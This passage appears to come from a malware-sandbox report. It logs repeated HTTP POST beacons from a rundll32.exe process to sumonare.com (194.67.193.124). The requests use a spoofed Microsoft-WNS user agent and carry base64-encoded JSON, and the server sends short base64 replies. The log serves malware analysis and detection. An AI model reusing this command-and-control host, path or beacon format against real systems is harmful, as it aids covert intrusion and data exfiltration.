                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:39.371830940 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:39 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                73192.168.2.749796194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:39.529113054 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:40.366312027 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:40 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                74192.168.2.749797194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:40.531222105 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:41.369374990 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:41 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                75192.168.2.749798194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:41.527412891 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:42.323307991 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:42 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                76192.168.2.749799194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:42.478333950 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:43.277096987 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:43 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                77192.168.2.749800194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:43.557797909 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:44.360965967 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:44 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                78192.168.2.749801194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:44.503117085 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:45.329581976 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:45 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                79192.168.2.749802194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:45.488121033 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:46.296605110 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:46 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                80192.168.2.749803194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:46.444000959 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:47.275290012 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:47 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                81192.168.2.749804194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:47.424736977 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:48.250792980 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:47 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                82192.168.2.749805194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:48.392682076 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:49.186009884 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:48 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                83192.168.2.749806194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:49.330503941 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
